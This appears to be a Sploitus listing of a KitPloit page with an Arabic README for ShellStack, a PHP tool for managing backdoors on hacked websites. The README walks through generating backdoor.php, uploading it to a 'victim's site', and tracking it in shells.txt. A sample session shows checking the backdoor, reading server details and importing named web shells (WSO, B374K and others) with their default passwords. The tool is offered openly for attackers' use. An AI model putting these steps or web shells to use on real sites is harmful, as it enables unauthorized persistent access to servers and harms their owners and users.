Sploitus

Exploit for shellstack

kitploit · 2026-08-28

Exploit Code

MARKDOWN139 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TUHINSHUBHRA-SHELLSTACK
# ShellStack

#### الإصدار 1.0

* * *

ShellStack هي أداة إدارة للباب الخلفي مبنية على PHP. هذه الأداة مفيدة لـ "الهاكرز" الذين يرغبون في تتبع كل موقع يخترقونه. تقوم الأداة بإنشاء ملف باب خلفي ما عليك سوى رفعه إلى الموقع ووضع رابط الباب الخلفي في ملف shells.txt الموجود في مجلد الأداة.

# باستخدام ShellStack يمكنك

  * استيراد شيلات PHP
  * الحصول على تفاصيل الخادم
  * رفع الملفات من نظامك باستخدام الطرفية
  * والأهم من ذلك، يمكنك إدارة أبوابك الخلفية بكفاءة



# كيفية الاستخدام

  1. `git clone https://github.com/Tuhinshubhra/shellstack`
  2. `cd shellstack`
  3. `php shellstack.php`
  4. `generatebd` ثم اخرج من الأداة باستخدام `CTRL` \+ `C` \- سيؤدي هذا إلى إنشاء ملف باب خلفي في نفس مجلد الأداة باسم **backdoor.php**
  5. ارفع ملف الباب الخلفي إلى موقع الضحية
  6. انسخ رابط الباب الخلفي والصقه في ملف **shells.txt** الموجود في مجلد الأداة واحفظه (_كل باب خلفي مفصول بسطر جديد_)
  7. `php shellstack.php`
  8. أدخل **الرقم التسلسلي** المخصص للباب الخلفي
  9. الباقي واضح بذاته



**شاهد الفيديو هنا:** https://youtu.be/umk3ZNZ5Y1I

# المتطلبات

root@kitploit:~
    
    
    php
    curl 
    

# مثال

root@kitploit:~
    
    
    root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php
    
    
    ________________________________________________________________________________
    _______ _     _ _______               _______ _______ _______ _______ _     _
    |______ |_____| |______ |      |      |______    |    |_____| |       |____/
    ______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
    ________________________________________________________________________________
    
                        Simple Backdoor Management System
                        Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                        Shout Out: LulZSec India  
    ================================================================================
    
    
    
    List Of Backdoors:
    
    0. http://localhost/backdoor.php
    =============================================
    
    [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0
    
    [+] Shell Selected: http://localhost/backdoor.php
    [+] Validating Backdoor: Backdoor Found!
    
    List Of Actions
    ================
    [1] Import PHP Shells
    [2] Server Details
    [3] Remove Backdoor
    [4] Remote File Upload
    [5] Exit
    
    [#] Select Option(1|2|3|4|5):2
    
    [+] Server Info
    [i] Sending Request And Getting Response...
    [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
    [i] Server IP: 127.0.0.1
    
    
    Press Enter To Continue
    
    
    List Of Actions
    ================
    [1] Import PHP Shells
    [2] Server Details
    [3] Remove Backdoor
    [4] Remote File Upload
    [5] Exit
    
    [#] Select Option(1|2|3|4|5):1
    
    
    List Of Shells
    ===============
    [1] Dhanush shell {User & Pass : shellstack123}
    [2] B374K shell {Pass : shellstack123}
    [3] Kurama shell V.1.0 {Pass : red}
    [4] WSO shell {Pass : shellstack123}
    [5] MiNi shell {User & Pass : shellstack123}
    
    [#] Select Shell To Import(1-5):1
    
    
    [i] Importing Shell...
    [i] Sending Request And Getting Response...
    [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php
    
    
    Press Enter To Continue
    
    
    List Of Actions
    ================
    [1] Import PHP Shells
    [2] Server Details
    [3] Remove Backdoor
    [4] Remote File Upload
    [5] Exit
    
    [#] Select Option(1|2|3|4|5):5
    root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 
    
    

# الإصدارات

> الإصدار 1.0 بتاريخ 14-06-2017